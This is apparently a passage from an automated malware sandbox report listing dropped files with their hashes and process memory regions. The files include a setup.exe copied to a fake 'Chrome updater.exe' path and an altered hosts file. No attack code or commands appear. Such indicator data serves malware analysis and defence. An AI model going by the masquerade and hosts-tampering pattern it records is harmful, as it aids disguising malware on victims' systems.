                                                      12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                    • C:\Windows\Temp\setup.exe
                                                      Filesize

                                                      7.3MB

                                                      MD5

                                                      0c9bed327840bbe964e85913d5868fcb

                                                      SHA1

                                                      ef0b874b57be491ae87ed0237a025d5580265218

                                                      SHA256

                                                      3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                      SHA512

                                                      12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                    • C:\Windows\system32\drivers\etc\hosts
                                                      Filesize

                                                      1KB

                                                      MD5

                                                      f3f6968a4c0f457f427eb17f7cc5f68b

                                                      SHA1

                                                      872933578f4b7d555158189ed02015f192daa7c6

                                                      SHA256

                                                      774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                                      SHA512

                                                      5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                                    • \??\PIPE\srvsvc
                                                      MD5

                                                      d41d8cd98f00b204e9800998ecf8427e

                                                      SHA1

                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                      SHA256

                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                      SHA512

                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                    • \Program Files\Chrome\updater.exe
                                                      Filesize

                                                      7.3MB

                                                      MD5

                                                      0c9bed327840bbe964e85913d5868fcb

                                                      SHA1

                                                      ef0b874b57be491ae87ed0237a025d5580265218

                                                      SHA256

                                                      3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                      SHA512

                                                      12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                    • \Windows\Temp\setup.exe
                                                      Filesize

                                                      7.3MB

                                                      MD5

                                                      0c9bed327840bbe964e85913d5868fcb

                                                      SHA1

                                                      ef0b874b57be491ae87ed0237a025d5580265218

                                                      SHA256

                                                      3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                      SHA512

                                                      12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                    • memory/108-100-0x0000000000000000-mapping.dmp
                                                    • memory/108-96-0x0000000000000000-mapping.dmp
                                                    • memory/336-84-0x0000000000000000-mapping.dmp
                                                    • memory/336-160-0x0000000000000000-mapping.dmp
                                                    • memory/336-92-0x0000000000000000-mapping.dmp
                                                    • memory/468-60-0x0000000000000000-mapping.dmp
                                                    • memory/544-91-0x0000000000000000-mapping.dmp
                                                    • memory/576-163-0x0000000000000000-mapping.dmp
                                                    • memory/588-89-0x0000000000000000-mapping.dmp
                                                    • memory/588-156-0x0000000000400000-0x000000000040C000-memory.dmp
                                                      Filesize

                                                      48KB

                                                    • memory/588-152-0x0000000000400000-0x000000000040C000-memory.dmp
                                                      Filesize

                                                      48KB

                                                    • memory/588-190-0x0000000000400000-0x000000000040C000-memory.dmp
                                                      Filesize

                                                      48KB

                                                    • memory/588-98-0x0000000000000000-mapping.dmp
                                                    • memory/588-151-0x0000000000400000-0x000000000040C000-memory.dmp
                                                      Filesize

                                                      48KB

                                                    • memory/588-101-0x0000000000000000-mapping.dmp
                                                    • memory/588-148-0x0000000000400000-0x000000000040C000-memory.dmp
                                                      Filesize

                                                      48KB

                                                    • memory/588-146-0x0000000000400000-0x000000000040C000-memory.dmp
                                                      Filesize

                                                      48KB

                                                    • memory/588-149-0x0000000000400000-0x000000000040C000-memory.dmp
                                                      Filesize

                                                      48KB

                                                    • memory/588-153-0x0000000000400000-0x000000000040C000-memory.dmp
                                                      Filesize

                                                      48KB

                                                    • memory/588-154-0x0000000000401BEA-mapping.dmp
                                                    • memory/608-104-0x0000000000000000-mapping.dmp
                                                    • memory/608-167-0x0000000000000000-mapping.dmp
                                                    • memory/672-141-0x0000000000000000-mapping.dmp
                                                    • memory/788-161-0x0000000000000000-mapping.dmp
                                                    • memory/788-110-0x0000000000000000-mapping.dmp
                                                    • memory/872-147-0x0000000000000000-mapping.dmp
                                                    • memory/940-138-0x0000000000000000-mapping.dmp
                                                    • memory/940-157-0x0000000000000000-mapping.dmp
                                                    • memory/948-105-0x0000000000000000-mapping.dmp
                                                    • memory/960-166-0x0000000000000000-mapping.dmp
                                                    • memory/968-99-0x0000000000000000-mapping.dmp
                                                    • memory/1000-54-0x0000000075F21000-0x0000000075F23000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1000-61-0x0000000003C20000-0x00000000048DD000-memory.dmp
                                                      Filesize

                                                      12.7MB

                                                    • memory/1088-83-0x0000000000000000-mapping.dmp
                                                    • memory/1088-114-0x0000000000000000-mapping.dmp
                                                    • memory/1108-126-0x0000000000000000-mapping.dmp
                                                    • memory/1108-198-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-187-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-185-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-197-0x0000000000160000-0x0000000000180000-memory.dmp
                                                      Filesize

                                                      128KB

                                                    • memory/1108-171-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-173-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-184-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-175-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-168-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-196-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-133-0x000000000123B000-0x000000000125A000-memory.dmp
                                                      Filesize

                                                      124KB

                                                    • memory/1108-183-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-169-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-132-0x0000000001234000-0x0000000001237000-memory.dmp
                                                      Filesize

                                                      12KB

                                                    • memory/1108-181-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-179-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-178-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-177-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-131-0x0000000001234000-0x0000000001237000-memory.dmp
                                                      Filesize

                                                      12KB

                                                    • memory/1108-130-0x000007FEED8A0000-0x000007FEEE3FD000-memory.dmp
                                                      Filesize

                                                      11.4MB

                                                    • memory/1108-189-0x0000000140000000-0x0000000140803000-memory.dmp
                                                      Filesize

                                                      8.0MB

                                                    • memory/1108-164-0x0000000000000000-mapping.dmp
                                                    • memory/1112-125-0x0000000000000000-mapping.dmp
                                                    • memory/1140-165-0x0000000000000000-mapping.dmp
                                                    • memory/1152-58-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                      Filesize

                                                      12.7MB

                                                    • memory/1152-65-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                      Filesize

                                                      12.7MB

                                                    • memory/1152-66-0x0000000077B20000-0x0000000077CC9000-memory.dmp
                                                      Filesize

                                                      1.7MB

                                                    • memory/1152-67-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                      Filesize

                                                      12.7MB

                                                    • memory/1152-56-0x0000000000000000-mapping.dmp
                                                    • memory/1152-68-0x0000000077B20000-0x0000000077CC9000-memory.dmp
                                                      Filesize

                                                      1.7MB

                                                    • memory/1256-143-0x0000000000000000-mapping.dmp
                                                    • memory/1272-139-0x0000000000000000-mapping.dmp
                                                    • memory/1272-195-0x0000000000060000-0x0000000000067000-memory.dmp
                                                      Filesize

                                                      28KB

                                                    • memory/1272-69-0x0000000000120000-0x000000000053C000-memory.dmp
                                                      Filesize

                                                      4.1MB

                                                    • memory/1272-70-0x000000001B9B0000-0x000000001BDCC000-memory.dmp
                                                      Filesize

                                                      4.1MB

                                                    • memory/1272-71-0x000007FEFC3A1000-0x000007FEFC3A3000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1272-191-0x00000000002C0000-0x00000000002C6000-memory.dmp
                                                      Filesize

                                                      24KB

                                                    • memory/1284-108-0x0000000000000000-mapping.dmp
                                                    • memory/1300-81-0x0000000000000000-mapping.dmp
                                                    • memory/1396-72-0x0000000000000000-mapping.dmp
                                                    • memory/1396-103-0x0000000000000000-mapping.dmp
                                                    • memory/1396-162-0x0000000000000000-mapping.dmp
                                                    • memory/1396-144-0x0000000000000000-mapping.dmp
                                                    • memory/1436-87-0x0000000000000000-mapping.dmp
                                                    • memory/1456-113-0x0000000000000000-mapping.dmp
                                                    • memory/1456-85-0x0000000000000000-mapping.dmp
                                                    • memory/1480-109-0x0000000000000000-mapping.dmp
                                                    • memory/1492-95-0x0000000000000000-mapping.dmp
                                                    • memory/1492-145-0x00000000010F0000-0x00000000010F6000-memory.dmp
                                                      Filesize

                                                      24KB

                                                    • memory/1516-142-0x0000000000000000-mapping.dmp
                                                    • memory/1524-137-0x0000000000000000-mapping.dmp
                                                    • memory/1580-159-0x0000000000000000-mapping.dmp
                                                    • memory/1600-86-0x0000000000000000-mapping.dmp
                                                    • memory/1604-106-0x0000000000000000-mapping.dmp
                                                    • memory/1608-119-0x00000000011D0000-0x0000000001E8D000-memory.dmp
                                                      Filesize

                                                      12.7MB

                                                    • memory/1608-123-0x00000000011D0000-0x0000000001E8D000-memory.dmp
                                                      Filesize

                                                      12.7MB

                                                    • memory/1668-82-0x0000000000000000-mapping.dmp
                                                    • memory/1680-102-0x0000000000000000-mapping.dmp
                                                    • memory/1692-90-0x0000000000000000-mapping.dmp
                                                    • memory/1692-140-0x0000000000000000-mapping.dmp
                                                    • memory/1692-59-0x0000000000000000-mapping.dmp
                                                    • memory/1692-158-0x0000000000000000-mapping.dmp
                                                    • memory/1728-135-0x0000000000000000-mapping.dmp
                                                    • memory/1728-111-0x0000000000000000-mapping.dmp
                                                    • memory/1736-93-0x0000000000000000-mapping.dmp
                                                    • memory/1768-73-0x0000000000000000-mapping.dmp
                                                    • memory/1768-76-0x000007FEEE780000-0x000007FEEF2DD000-memory.dmp
                                                      Filesize

                                                      11.4MB

                                                    • memory/1768-78-0x0000000002804000-0x0000000002807000-memory.dmp
                                                      Filesize

                                                      12KB

                                                    • memory/1768-77-0x000000001B6F0000-0x000000001B9EF000-memory.dmp
                                                      Filesize

                                                      3.0MB

                                                    • memory/1768-79-0x0000000002804000-0x0000000002807000-memory.dmp
                                                      Filesize

                                                      12KB

                                                    • memory/1768-80-0x000000000280B000-0x000000000282A000-memory.dmp
                                                      Filesize

                                                      124KB

                                                    • memory/1784-107-0x0000000000000000-mapping.dmp
                                                    • memory/1784-94-0x0000000000000000-mapping.dmp
                                                    • memory/1896-88-0x0000000000000000-mapping.dmp
                                                    • memory/1896-134-0x0000000000000000-mapping.dmp
                                                    • memory/1968-97-0x0000000000000000-mapping.dmp
                                                    • memory/1968-116-0x0000000000000000-mapping.dmp
                                                    • memory/1968-118-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                      Filesize

                                                      12.7MB

                                                    • memory/1968-120-0x0000000077B20000-0x0000000077CC9000-memory.dmp
                                                      Filesize

                                                      1.7MB

                                                    • memory/1968-121-0x0000000077B20000-0x0000000077CC9000-memory.dmp
                                                      Filesize

                                                      1.7MB

                                                    • memory/1968-122-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                      Filesize

                                                      12.7MB